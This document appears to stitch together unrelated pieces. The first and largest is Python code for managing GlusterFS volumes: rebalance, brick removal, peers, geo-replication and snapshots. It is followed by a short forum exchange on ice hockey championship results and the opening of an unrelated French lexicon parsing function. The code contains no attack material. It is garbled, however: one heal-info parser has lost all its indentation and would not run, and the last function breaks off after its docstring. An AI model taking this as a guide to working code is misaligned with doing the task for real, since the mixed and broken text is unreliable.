        hosts.append({'name': el.find('nodeName').text,
                      'id': el.find('id').text,
                      'runtime': el.find('runtime').text,
                      'filesScanned': el.find('lookups').text,
                      'filesMoved': el.find('files').text,
                      'filesFailed': el.find('failures').text,
                      'filesSkipped': el.find('skipped').text,
                      'totalSizeMoved': el.find('size').text,
                      'status': _normalize(el.find('statusStr').text)})
    return {'summary': summary, 'hosts': hosts}
@gluster_mgmt_api
def volumeRebalanceStatus(volumeName):
    """Return the parsed status of a rebalance on volumeName."""
    cmd = _getGlusterVolCmd() + ["rebalance", volumeName, "status"]
    try:
        xmltree = _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeRebalanceStatusFailedException(rc=e.rc,
                                                             err=e.err)
    try:
        return _parseVolumeRebalanceRemoveBrickStatus(xmltree, 'rebalance')
    except _etreeExceptions:
        raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeReplaceBrickCommitForce(volumeName, existingBrick, newBrick):
    """Replace a brick with `commit force`; returns True on success."""
    cmd = _getGlusterVolCmd() + ["replace-brick", volumeName,
                                 existingBrick, newBrick, "commit",
                                 "force"]
    try:
        _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeReplaceBrickCommitForceFailedException(
            rc=e.rc, err=e.err)
    return True
@gluster_mgmt_api
def volumeRemoveBrickStart(volumeName, brickList, replicaCount=0):
    """Start a remove-brick operation; returns {'taskId': <task id>}."""
    cmd = _getGlusterVolCmd() + ["remove-brick", volumeName]
    if replicaCount:
        cmd += ["replica", "%s" % replicaCount]
    cmd += brickList + ["start"]
    try:
        xmltree = _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeRemoveBrickStartFailedException(rc=e.rc,
                                                              err=e.err)
    try:
        return {'taskId': xmltree.find('volRemoveBrick/task-id').text}
    except _etreeExceptions:
        raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeRemoveBrickStop(volumeName, brickList, replicaCount=0):
    """Stop a remove-brick operation; returns the parsed final status."""
    cmd = _getGlusterVolCmd() + ["remove-brick", volumeName]
    if replicaCount:
        cmd += ["replica", "%s" % replicaCount]
    cmd += brickList + ["stop"]
    try:
        xmltree = _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeRemoveBrickStopFailedException(rc=e.rc,
                                                             err=e.err)
    try:
        return _parseVolumeRebalanceRemoveBrickStatus(xmltree,
                                                      'remove-brick')
    except _etreeExceptions:
        raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeRemoveBrickStatus(volumeName, brickList, replicaCount=0):
    """Return the parsed status of a remove-brick operation."""
    cmd = _getGlusterVolCmd() + ["remove-brick", volumeName]
    if replicaCount:
        cmd += ["replica", "%s" % replicaCount]
    cmd += brickList + ["status"]
    try:
        xmltree = _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeRemoveBrickStatusFailedException(rc=e.rc,
                                                               err=e.err)
    try:
        return _parseVolumeRebalanceRemoveBrickStatus(xmltree,
                                                      'remove-brick')
    except _etreeExceptions:
        raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeRemoveBrickCommit(volumeName, brickList, replicaCount=0):
    """Commit a finished remove-brick operation; returns True."""
    cmd = _getGlusterVolCmd() + ["remove-brick", volumeName]
    if replicaCount:
        cmd += ["replica", "%s" % replicaCount]
    cmd += brickList + ["commit"]
    try:
        _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeRemoveBrickCommitFailedException(rc=e.rc,
                                                               err=e.err)
    return True
@gluster_mgmt_api
def volumeRemoveBrickForce(volumeName, brickList, replicaCount=0):
    """Force-remove bricks without data migration; returns True."""
    cmd = _getGlusterVolCmd() + ["remove-brick", volumeName]
    if replicaCount:
        cmd += ["replica", "%s" % replicaCount]
    cmd += brickList + ["force"]
    try:
        _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeRemoveBrickForceFailedException(rc=e.rc,
                                                              err=e.err)
    return True
@gluster_mgmt_api
def peerProbe(hostName):
    """Probe (add) a peer into the trusted storage pool; returns True."""
    cmd = _getGlusterPeerCmd() + ["probe", hostName]
    try:
        _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterHostAddFailedException(rc=e.rc, err=e.err)
    return True
@gluster_mgmt_api
def peerDetach(hostName, force=False):
    """Detach a peer from the trusted storage pool; returns True."""
    cmd = _getGlusterPeerCmd() + ["detach", hostName]
    if force:
        cmd.append('force')
    try:
        _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        # rc 2 means gluster does not know the host at all
        if e.rc == 2:
            raise ge.GlusterHostNotFoundException(rc=e.rc, err=e.err)
        raise ge.GlusterHostRemoveFailedException(rc=e.rc, err=e.err)
    return True
def _parsePeerStatus(tree, gHostName, gUuid, gStatus):
    """Build the host list: the local node first, then every peer."""
    def _peerState(peer):
        # state '3' is the established-peer state; anything else is UNKNOWN
        if peer.find('state').text != '3':
            return HostStatus.UNKNOWN
        if peer.find('connected').text == '1':
            return HostStatus.CONNECTED
        return HostStatus.DISCONNECTED

    hostList = [{'hostname': gHostName, 'uuid': gUuid, 'status': gStatus}]
    for peer in tree.findall('peerStatus/peer'):
        hostList.append({'hostname': peer.find('hostname').text,
                         'uuid': peer.find('uuid').text,
                         'status': _peerState(peer)})
    return hostList
@gluster_mgmt_api
def peerStatus():
    """
    Returns:
        [{'hostname': HOSTNAME, 'uuid': UUID, 'status': STATE}, ...]
    """
    cmd = _getGlusterPeerCmd() + ["status"]
    try:
        xmltree = _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterHostsListFailedException(rc=e.rc, err=e.err)
    # the local node does not appear in its own peer list, so prepend it
    localName = _getLocalIpAddress() or _getGlusterHostName()
    try:
        return _parsePeerStatus(xmltree, localName,
                                hostUUIDGet(), HostStatus.CONNECTED)
    except _etreeExceptions:
        raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeProfileStart(volumeName):
    """Enable profiling on a volume; returns True on success."""
    cmd = _getGlusterVolCmd() + ["profile", volumeName, "start"]
    try:
        _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeProfileStartFailedException(rc=e.rc, err=e.err)
    return True
@gluster_mgmt_api
def volumeProfileStop(volumeName):
    """Disable profiling on a volume; returns True on success."""
    cmd = _getGlusterVolCmd() + ["profile", volumeName, "stop"]
    try:
        _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeProfileStopFailedException(rc=e.rc, err=e.err)
    return True
@gluster_mgmt_api
def volumeProfileInfo(volumeName, nfs=False):
    """Run ``volume profile <vol> info`` and return the parsed result.

    Returns {'volumeName': VOLUME-NAME,
             'bricks' (or 'nfsServers' when nfs=True): [
                 {'brick'/'nfs': NAME,
                  'cumulativeStats': {'blockStats': [{'size', 'read',
                                                      'write'}, ...],
                                      'fopStats': [{'name', 'hits',
                                                    'latencyAvg',
                                                    'latencyMin',
                                                    'latencyMax'}, ...],
                                      'duration', 'totalRead',
                                      'totalWrite'},
                  'intervalStats': {same shape as cumulativeStats}},
                 ...]}
    """
    cmd = _getGlusterVolCmd() + ["profile", volumeName, "info"]
    if nfs:
        cmd.append("nfs")
    try:
        xmltree = _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeProfileInfoFailedException(rc=e.rc, err=e.err)
    try:
        return _parseVolumeProfileInfo(xmltree, nfs)
    except _etreeExceptions:
        raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
def _parseVolumeTasks(tree):
    """Parse ``volume status ... tasks`` XML output.

    returns {TaskId: {'volumeName': VolumeName,
                      'taskType': TaskType,
                      'status': STATUS,
                      'bricks': BrickList}, ...}
    """
    tasks = {}
    for volumeEl in tree.findall('volStatus/volumes/volume'):
        volumeName = volumeEl.find('volName').text
        for taskEl in volumeEl.findall('tasks/task'):
            taskType = taskEl.find(
                'type').text.upper().replace('-', '_').replace(' ', '_')
            bricks = []
            if taskType == TaskType.REPLACE_BRICK:
                bricks = [taskEl.find('params/srcBrick').text,
                          taskEl.find('params/dstBrick').text]
            elif taskType == TaskType.REMOVE_BRICK:
                bricks = [b.text for b in taskEl.findall('params/brick')]
            # rebalance tasks carry no brick parameters
            statusStr = taskEl.find('statusStr').text.upper() \
                .replace('-', '_') \
                .replace(' ', '_')
            tasks[taskEl.find('id').text] = {'volumeName': volumeName,
                                             'taskType': taskType,
                                             'status': statusStr,
                                             'bricks': bricks}
    return tasks
@gluster_mgmt_api
def volumeTasks(volumeName="all"):
    """Return the async tasks (rebalance/remove/replace-brick) per volume."""
    cmd = _getGlusterVolCmd() + ["status", volumeName, "tasks"]
    try:
        xmltree = _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeTasksFailedException(rc=e.rc, err=e.err)
    try:
        return _parseVolumeTasks(xmltree)
    except _etreeExceptions:
        raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeGeoRepSessionStart(volumeName, remoteHost, remoteVolumeName,
                             remoteUserName=None, force=False):
    """Start a geo-replication session; returns True on success."""
    userAtHost = remoteHost if not remoteUserName else (
        "%s@%s" % (remoteUserName, remoteHost))
    cmd = _getGlusterVolGeoRepCmd() + [
        volumeName, "%s::%s" % (userAtHost, remoteVolumeName), "start"]
    if force:
        cmd.append('force')
    try:
        _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeGeoRepSessionStartFailedException(rc=e.rc,
                                                                err=e.err)
    return True
@gluster_mgmt_api
def volumeGeoRepSessionStop(volumeName, remoteHost, remoteVolumeName,
                            remoteUserName=None, force=False):
    """Stop a geo-replication session; returns True on success."""
    userAtHost = remoteHost if not remoteUserName else (
        "%s@%s" % (remoteUserName, remoteHost))
    cmd = _getGlusterVolGeoRepCmd() + [
        volumeName, "%s::%s" % (userAtHost, remoteVolumeName), "stop"]
    if force:
        cmd.append('force')
    try:
        _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeGeoRepSessionStopFailedException(rc=e.rc,
                                                               err=e.err)
    return True
def _parseGeoRepStatus(tree):
    """Parse geo-replication status XML output.

    Returns:
        {volume-name: {'sessions': [
            {'sessionKey': 'key to identify the session',
             'remoteVolumeName': 'volume in remote gluster cluster',
             'bricks': [{'host', 'hostUuid', 'brickName', 'remoteHost',
                         'remoteUserName', 'status', 'crawlStatus',
                         'timeZone', 'lastSynced', 'checkpointTime',
                         'checkpointCompletionTime', 'entry', 'data',
                         'meta', 'failures',
                         'checkpointCompleted'}, ...]},
            ...]}, ...}
    Timestamps are converted to epoch seconds unless gluster reports
    'N/A', which is passed through unchanged.
    """
    def _toEpoch(value):
        # gluster reports 'N/A' until the event has happened at least once;
        # factored out of the three timestamp fields below
        if value == 'N/A':
            return value
        return calendar.timegm(
            time.strptime(value, "%Y-%m-%d %H:%M:%S"))

    status = {}
    for volume in tree.findall('geoRep/volume'):
        sessions = []
        for session in volume.findall('sessions/session'):
            sessionDetail = {}
            sessionDetail['sessionKey'] = session.find('session_slave').text
            # session key looks like '<id>::<slavevol>:<uuid>'
            sessionDetail['remoteVolumeName'] = sessionDetail[
                'sessionKey'].split("::")[-1].split(":")[0]
            pairs = []
            for pair in session.findall('pair'):
                pairDetail = {
                    'host': pair.find('master_node').text,
                    'hostUuid': pair.find('master_node_uuid').text,
                    'brickName': pair.find('master_brick').text,
                    'remoteHost': pair.find('slave_node').text,
                    'remoteUserName': pair.find('slave_user').text,
                    'status': pair.find('status').text,
                    'crawlStatus': pair.find('crawl_status').text,
                    'timeZone': _TIME_ZONE,
                    'lastSynced': _toEpoch(pair.find('last_synced').text),
                    'checkpointTime': _toEpoch(
                        pair.find('checkpoint_time').text),
                    'checkpointCompletionTime': _toEpoch(
                        pair.find('checkpoint_completion_time').text),
                    'entry': pair.find('entry').text,
                    'data': pair.find('data').text,
                    'meta': pair.find('meta').text,
                    'failures': pair.find('failures').text,
                    'checkpointCompleted': pair.find(
                        'checkpoint_completed').text,
                }
                pairs.append(pairDetail)
            sessionDetail['bricks'] = pairs
            sessions.append(sessionDetail)
        status[volume.find('name').text] = {'sessions': sessions}
    return status
@gluster_mgmt_api
def volumeGeoRepStatus(volumeName=None, remoteHost=None,
                       remoteVolumeName=None, remoteUserName=None):
    """Return the parsed geo-replication status (optionally filtered)."""
    userAtHost = remoteHost if not remoteUserName else (
        "%s@%s" % (remoteUserName, remoteHost))
    cmd = _getGlusterVolGeoRepCmd()
    if volumeName:
        cmd.append(volumeName)
    if remoteHost and remoteVolumeName:
        cmd.append("%s::%s" % (userAtHost, remoteVolumeName))
    cmd.append("status")
    try:
        xmltree = _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterGeoRepStatusFailedException(rc=e.rc, err=e.err)
    try:
        return _parseGeoRepStatus(xmltree)
    except _etreeExceptions:
        raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def volumeGeoRepSessionPause(volumeName, remoteHost, remoteVolumeName,
                             remoteUserName=None, force=False):
    """Pause a geo-replication session; returns True on success."""
    userAtHost = remoteHost if not remoteUserName else (
        "%s@%s" % (remoteUserName, remoteHost))
    cmd = _getGlusterVolGeoRepCmd() + [
        volumeName, "%s::%s" % (userAtHost, remoteVolumeName), "pause"]
    if force:
        cmd.append('force')
    try:
        _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeGeoRepSessionPauseFailedException(rc=e.rc,
                                                                err=e.err)
    return True
@gluster_mgmt_api
def volumeGeoRepSessionResume(volumeName, remoteHost, remoteVolumeName,
                              remoteUserName=None, force=False):
    """Resume a paused geo-replication session; returns True on success."""
    userAtHost = remoteHost if not remoteUserName else (
        "%s@%s" % (remoteUserName, remoteHost))
    cmd = _getGlusterVolGeoRepCmd() + [
        volumeName, "%s::%s" % (userAtHost, remoteVolumeName), "resume"]
    if force:
        cmd.append('force')
    try:
        _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeGeoRepSessionResumeFailedException(rc=e.rc,
                                                                 err=e.err)
    return True
def _parseVolumeGeoRepConfig(tree):
    """Parse geo-replication config XML output.

    Returns:
        {'geoRepConfig': {'optionName': 'optionValue', ...}}
    """
    conf = tree.find('geoRep/config')
    # Element.getchildren() was removed in Python 3.9; iterate directly
    config = {}
    for child in conf:
        config[child.tag] = child.text
    return {'geoRepConfig': config}
@gluster_mgmt_api
def volumeGeoRepConfig(volumeName, remoteHost,
                       remoteVolumeName, optionName=None,
                       optionValue=None,
                       remoteUserName=None):
    """Get, set or reset geo-replication config options.

    With optionName+optionValue the option is set; with only optionName it
    is reset ('!option'); with neither, the full parsed config is returned.
    Returns True for set/reset, otherwise {'geoRepConfig': {...}}.
    """
    userAtHost = remoteHost if not remoteUserName else (
        "%s@%s" % (remoteUserName, remoteHost))
    cmd = _getGlusterVolGeoRepCmd() + [
        volumeName, "%s::%s" % (userAtHost, remoteVolumeName), "config"]
    if optionName and optionValue:
        cmd += [optionName, optionValue]
    elif optionName:
        cmd += ["!%s" % optionName]
    try:
        xmltree = _execGlusterXml(cmd)
        if optionName:
            # set/reset requests have no payload worth parsing
            return True
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterGeoRepConfigFailedException(rc=e.rc, err=e.err)
    try:
        return _parseVolumeGeoRepConfig(xmltree)
    except _etreeExceptions:
        raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def snapshotCreate(volumeName, snapName,
                   snapDescription=None,
                   force=False):
    """Create a snapshot; returns {'uuid': ..., 'name': ...}."""
    cmd = _getGlusterSnapshotCmd() + ["create", snapName, volumeName]
    if snapDescription:
        cmd += ['description', snapDescription]
    if force:
        cmd.append('force')
    try:
        xmltree = _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterSnapshotCreateFailedException(rc=e.rc, err=e.err)
    try:
        return {'uuid': xmltree.find('snapCreate/snapshot/uuid').text,
                'name': xmltree.find('snapCreate/snapshot/name').text}
    except _etreeExceptions:
        raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def snapshotDelete(volumeName=None, snapName=None):
    """Delete one snapshot by name, or all snapshots of a volume."""
    cmd = _getGlusterSnapshotCmd() + ["delete"]
    if snapName:
        cmd.append(snapName)
    elif volumeName:
        cmd += ["volume", volumeName]
    # xml output not used because of BZ:1161416 in gluster cli
    rc, out, err = _execGluster(cmd)
    if not rc:
        return True
    raise ge.GlusterSnapshotDeleteFailedException(rc, out, err)
@gluster_mgmt_api
def snapshotActivate(snapName, force=False):
    """Activate (start) a snapshot volume; returns True on success."""
    cmd = _getGlusterSnapshotCmd() + ["activate", snapName]
    if force:
        cmd.append('force')
    try:
        _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterSnapshotActivateFailedException(rc=e.rc, err=e.err)
    return True
@gluster_mgmt_api
def snapshotDeactivate(snapName):
    """Deactivate (stop) a snapshot volume; returns True on success."""
    cmd = _getGlusterSnapshotCmd() + ["deactivate", snapName]
    try:
        _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterSnapshotDeactivateFailedException(rc=e.rc, err=e.err)
    return True
def _parseRestoredSnapshot(tree):
    """Parse ``snapshot restore`` XML output.

    returns {'volumeName': 'vol1',
             'volumeUuid': 'uuid',
             'snapshotName': 'snap2',
             'snapshotUuid': 'uuid'}
    """
    return {
        'volumeName': tree.find('snapRestore/volume/name').text,
        'volumeUuid': tree.find('snapRestore/volume/uuid').text,
        'snapshotName': tree.find('snapRestore/snapshot/name').text,
        'snapshotUuid': tree.find('snapRestore/snapshot/uuid').text,
    }
@gluster_mgmt_api
def snapshotRestore(snapName):
    """Restore a volume from a snapshot; returns the parsed result."""
    cmd = _getGlusterSnapshotCmd() + ["restore", snapName]
    try:
        xmltree = _execGlusterXml(cmd)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterSnapshotRestoreFailedException(rc=e.rc, err=e.err)
    try:
        return _parseRestoredSnapshot(xmltree)
    except _etreeExceptions:
        raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
def _parseSnapshotConfigList(tree):
    """Parse ``snapshot config`` XML output.

    returns {'system': {'snap-max-hard-limit': 'hardlimit',
                        'snap-max-soft-limit': 'softLimit',
                        'auto-delete': 'enable/disable',
                        'activate-on-create': 'enable/disable'},
             'volume': {'name': {'snap-max-hard-limit': 'hardlimit'}}}
    """
    # cluster-wide settings
    systemConfig = {
        'snap-max-hard-limit': tree.find(
            'snapConfig/systemConfig/hardLimit').text,
        'snap-max-soft-limit': tree.find(
            'snapConfig/systemConfig/softLimit').text,
        'auto-delete': tree.find(
            'snapConfig/systemConfig/autoDelete').text,
        'activate-on-create': tree.find(
            'snapConfig/systemConfig/activateOnCreate').text,
    }
    # per-volume effective limits
    volumeConfig = {}
    for el in tree.findall('snapConfig/volumeConfig/volume'):
        volumeConfig[el.find('name').text] = {
            'snap-max-hard-limit': el.find('effectiveHardLimit').text}
    return {'system': systemConfig, 'volume': volumeConfig}
@gluster_mgmt_api
def snapshotConfig(volumeName=None, optionName=None, optionValue=None):
    """Query or set snapshot configuration.

    With neither optionName nor optionValue, returns the parsed
    configuration listing (see _parseSnapshotConfigList), optionally
    scoped to *volumeName*.  When both optionName and optionValue are
    given, the option is set and None is returned.
    """
    settingOption = bool(optionName and optionValue)
    command = _getGlusterSnapshotCmd() + ["config"]
    if volumeName:
        command.append(volumeName)
    if settingOption:
        command += [optionName, optionValue]
    try:
        xmltree = _execGlusterXml(command)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterSnapshotConfigFailedException(rc=e.rc, err=e.err)
    if settingOption:
        # A set operation returns no listing worth parsing.
        return
    try:
        return _parseSnapshotConfigList(xmltree)
    except _etreeExceptions:
        raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
def _parseVolumeSnapshotList(tree):
    """Parse 'gluster snapshot info volume <name>' XML output.

    returns {'v1': {'snapshots': [{'name': 'snap1_v1',
                                   'description': 'snapshot description',
                                   'id': '8add41ae-c60c-4023'
                                         '-a1a6-5093a5d35603',
                                   'createTime': {'timeZone': 'IST',
                                                  'epochTime': 1414427114},
                                   'snapVolume':
                                       '5eeaf23def3f446d898e1de8461a6aa7',
                                   'snapVolumeStatus': 'ACTIVATED'}, ...],
                    'snapRemaining': 252}
            }
    """
    # Bail out before touching originVolume: with zero snapshots the
    # originVolume sub-tree may be absent, and find() would return None,
    # crashing with AttributeError on .text.  (Previously the volume
    # dict was built first and the count checked afterwards.)
    if int(tree.find('snapInfo/count').text) == 0:
        return {}
    volumeName = tree.find('snapInfo/originVolume/name').text
    volume = {volumeName: {
        'snapRemaining': tree.find('snapInfo/originVolume/snapRemaining').text,
        'snapshots': []
    }}
    for el in tree.findall('snapInfo/snapshots/snapshot'):
        snapshot = {}
        snapshot['id'] = el.find('uuid').text
        # <description> is optional in the gluster reply.
        snapshot['description'] = "" if el.find('description') is None \
            else el.find('description').text
        snapshot['createTime'] = {
            'epochTime': calendar.timegm(
                time.strptime(el.find('createTime').text,
                              "%Y-%m-%d %H:%M:%S")
            ),
            'timeZone': _TIME_ZONE
        }
        snapshot['snapVolume'] = el.find('snapVolume/name').text
        status = el.find('snapVolume/status').text
        # gluster reports Started/Stopped; map onto the vdsm enum.
        if status.upper() == 'STARTED':
            snapshot['snapVolumeStatus'] = SnapshotStatus.ACTIVATED
        else:
            snapshot['snapVolumeStatus'] = SnapshotStatus.DEACTIVATED
        snapshot['name'] = el.find('name').text
        volume[volumeName]['snapshots'].append(snapshot)
    return volume
def _parseAllVolumeSnapshotList(tree):
    """Parse 'gluster snapshot info' XML output covering all volumes.

    Returns a dict keyed by origin volume name; each value has a
    'snapRemaining' count and a 'snapshots' list of dicts with 'id',
    'name', 'description', 'createTime' ({'epochTime', 'timeZone'}),
    'snapVolumeName' and 'snapVolumeStatus'.  Empty dict when there
    are no snapshots.
    """
    if int(tree.find('snapInfo/count').text) == 0:
        return {}
    volumes = {}
    for snapEl in tree.findall('snapInfo/snapshots/snapshot'):
        descEl = snapEl.find('description')  # optional element
        created = time.strptime(snapEl.find('createTime').text,
                                "%Y-%m-%d %H:%M:%S")
        state = snapEl.find('snapVolume/status').text
        snapshot = {
            'id': snapEl.find('uuid').text,
            'name': snapEl.find('name').text,
            'description': descEl.text if descEl is not None else "",
            'createTime': {'epochTime': calendar.timegm(created),
                           'timeZone': _TIME_ZONE},
            'snapVolumeName': snapEl.find('snapVolume/name').text,
            # gluster reports Started/Stopped; map onto the vdsm enum.
            'snapVolumeStatus': (SnapshotStatus.ACTIVATED
                                 if state.upper() == 'STARTED'
                                 else SnapshotStatus.DEACTIVATED),
        }
        originName = snapEl.find('snapVolume/originVolume/name').text
        # First snapshot of a volume also establishes its entry.
        entry = volumes.setdefault(originName, {
            'snapRemaining': snapEl.find(
                'snapVolume/originVolume/snapRemaining').text,
            'snapshots': []
        })
        entry['snapshots'].append(snapshot)
    return volumes
@gluster_mgmt_api
def snapshotInfo(volumeName=None):
    """Return snapshot information, for one volume or for all volumes.

    With *volumeName*, only that volume's snapshots are listed;
    otherwise snapshots of every volume are returned.  Raises
    GlusterSnapshotInfoFailedException on command failure and
    GlusterXmlErrorException on an unparsable reply.
    """
    command = _getGlusterSnapshotCmd() + ["info"]
    if volumeName:
        command += ["volume", volumeName]
    try:
        xmltree = _execGlusterXml(command)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterSnapshotInfoFailedException(rc=e.rc, err=e.err)
    # Single-volume and all-volume replies have different shapes.
    parser = _parseVolumeSnapshotList if volumeName \
        else _parseAllVolumeSnapshotList
    try:
        return parser(xmltree)
    except _etreeExceptions:
        raise ge.GlusterXmlErrorException(err=[etree.tostring(xmltree)])
@gluster_mgmt_api
def executeGsecCreate():
    """Run 'gluster system:: execute gsec_create' to generate the
    geo-replication public key file.

    Returns True on success; raises
    GlusterGeoRepPublicKeyFileCreateFailedException otherwise.
    """
    rc, out, err = _execGluster(
        _getGlusterSystemCmd() + ["execute", "gsec_create"])
    if rc:
        raise ge.GlusterGeoRepPublicKeyFileCreateFailedException(rc, out, err)
    return True
@gluster_mgmt_api
def executeMountBrokerUserAdd(remoteUserName, remoteVolumeName):
    """Register a mountbroker user for the given remote volume.

    Returns True on success; raises
    GlusterGeoRepExecuteMountBrokerUserAddFailedException otherwise.
    """
    command = _getGlusterSystemCmd() + ["execute", "mountbroker", "user",
                                        remoteUserName, remoteVolumeName]
    rc, out, err = _execGluster(command)
    if rc:
        raise ge.GlusterGeoRepExecuteMountBrokerUserAddFailedException(
            rc, out, err)
    return True
@gluster_mgmt_api
def executeMountBrokerOpt(optionName, optionValue):
    """Set a mountbroker option via 'gluster system:: execute'.

    Returns True on success; raises
    GlusterGeoRepExecuteMountBrokerOptFailedException otherwise.
    """
    command = _getGlusterSystemCmd() + ["execute", "mountbroker", "opt",
                                        optionName, optionValue]
    rc, out, err = _execGluster(command)
    if rc:
        raise ge.GlusterGeoRepExecuteMountBrokerOptFailedException(
            rc, out, err)
    return True
@gluster_mgmt_api
def volumeGeoRepSessionCreate(volumeName, remoteHost,
                              remoteVolumeName,
                              remoteUserName=None, force=False):
    """Create a geo-replication session from *volumeName* to the remote
    volume, optionally as a specific remote user and/or with 'force'.

    Returns True on success; raises
    GlusterGeoRepSessionCreateFailedException otherwise.
    """
    userAtHost = ("%s@%s" % (remoteUserName, remoteHost)
                  if remoteUserName else remoteHost)
    remoteEndpoint = "%s::%s" % (userAtHost, remoteVolumeName)
    command = _getGlusterVolCmd() + ["geo-replication", volumeName,
                                     remoteEndpoint, "create", "no-verify"]
    if force:
        command.append('force')
    try:
        _execGlusterXml(command)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterGeoRepSessionCreateFailedException(rc=e.rc, err=e.err)
    return True
@gluster_mgmt_api
def volumeGeoRepSessionDelete(volumeName, remoteHost, remoteVolumeName,
                              remoteUserName=None):
    """Delete the geo-replication session between *volumeName* and the
    remote volume, optionally addressed as a specific remote user.

    Returns True on success; raises
    GlusterGeoRepSessionDeleteFailedException otherwise.
    """
    userAtHost = ("%s@%s" % (remoteUserName, remoteHost)
                  if remoteUserName else remoteHost)
    remoteEndpoint = "%s::%s" % (userAtHost, remoteVolumeName)
    command = _getGlusterVolCmd() + ["geo-replication", volumeName,
                                     remoteEndpoint, "delete"]
    try:
        _execGlusterXml(command)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterGeoRepSessionDeleteFailedException(rc=e.rc, err=e.err)
    return True
@gluster_mgmt_api
def volumeHealInfo(volumeName=None):
    """Return self-heal information for *volumeName* (see
    _parseVolumeHealInfo for the result shape).

    NOTE(review): the None default would put None into the command
    list; callers presumably always pass a volume name -- confirm.
    """
    healCommand = _getGlusterVolCmd() + ["heal", volumeName, 'info']
    try:
        replyTree = _execGlusterXml(healCommand)
        return _parseVolumeHealInfo(replyTree)
    except ge.GlusterCmdFailedException as e:
        raise ge.GlusterVolumeHealInfoFailedException(rc=e.rc, err=e.err)
    except _etreeExceptions:
        raise ge.GlusterXmlErrorException(err=[etree.tostring(replyTree)])
def _parseVolumeHealInfo(tree):
"""
{'bricks': [{'name': 'Fully qualified brick path',
'status': 'Connected/Not Connected'
'numberOfEntries': int,
'hostUuid': 'UUID'},...]
}
"""
healInfo = {'bricks': []}
for el in tree.findall('healInfo/bricks/brick'):
brick = {}
brick['name'] = el.find('name').text
brick['status'] = el.find('status').text
brick['hostUuid'] = el.get('hostUuid')
if brick['status'] == 'Connected':
brick['numberOfEntries'] = el.find('numberOfEntries').text
healInfo['bricks'].append(brick)
return healInfo
def exists():
    """Return True when the gluster command-line binary is present.

    The OSError guard is kept for defensiveness, but it now compares
    against ``errno.ENOENT``: ``os.errno`` was never a documented
    attribute and was removed in Python 3.7 (bpo-33666), so the old
    ``os.errno.ENOENT`` lookup raised AttributeError instead of
    re-raising the original error.
    """
    import errno  # local import keeps this fix self-contained
    try:
        return os.path.exists(_glusterCommandPath.cmd)
    except OSError as e:
        if e.errno != errno.ENOENT:
            raise
        return False
|
So, as expected, we'll hardly get any coverage in Italy... amazing.
Japan beat Estonia 2-1 in overtime in the opening game of Division I B — a nice and valuable point for Estonia too, after a hard fight against the favourites of the match.
GB at the same time surprisingly leading 2-1 against Slovenia after two periods in Div I A !
1. ex aequo Lithuania and Ukraine 3 pts, 3. Japan 2 pts, 4. Estonia 1 pt, 5. ex aequo Croatia and Romania 0 pts.
Unexpected victory, good job guys..
Unexpected victory, good job guys..
1. Kazakhstan 3 pts, 2. ex aequo Great Britain and Italy 3 pts, 4. ex aequo Poland and Slovenia 0 pts, 6. Hungary 0 pts.
|
# coding: utf-8
def fonction(lex_name, number_name):
    """Yield Lexique rows extended with (isinteger, integer) columns.

    lex_name    -- tab-separated lexicon file, read as UTF-8; the first
                   line is a header and is skipped.
    number_name -- basename of a pickle file ('<number_name>.pickle')
                   holding {'français': {number: {'graphie': ...,
                   'phonologie': ...}, ...}}.

    For every data line, yields the raw tab-split fields followed by
    (1, number) when the entry is a numeral whose spelling and
    phonology match a known number, else (0, "").
    """
    import codecs
